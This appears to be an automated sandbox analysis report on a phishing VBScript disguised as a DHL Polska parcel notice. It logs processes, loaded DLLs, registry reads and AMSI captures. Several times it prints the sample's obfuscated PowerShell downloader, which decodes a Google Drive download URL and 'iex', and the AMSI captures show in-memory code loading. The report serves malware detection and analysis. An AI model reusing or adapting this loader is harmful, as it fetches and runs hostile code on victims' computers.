Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6160
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$PadleJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"Jump to behavior
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

            Data Obfuscation

            Source: Yara match | File source: 00000009.00000002.2973558788.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Nonscalar)$global:Abet226 = [System.Text.Encoding]::ASCII.GetString($Galluptallenes29)$global:Unsweltering=$Abet226.substring($Firetogs123,$Stjrthagerne)<#protyl Mccracken chorizatio
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gaardrydningers $Ultratense $Listeformers), (Vandomraaderne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tetrabrach = [AppDomain]::CurrentDomain.GetAsse
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Speltens192)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($fluffier, $false).DefineType($Kamikazepiloten
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Nonscalar)$global:Abet226 = [System.Text.Encoding]::ASCII.GetString($Galluptallenes29)$global:Unsweltering=$Abet226.substring($Firetogs123,$Stjrthagerne)<#protyl Mccracken chorizatio
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
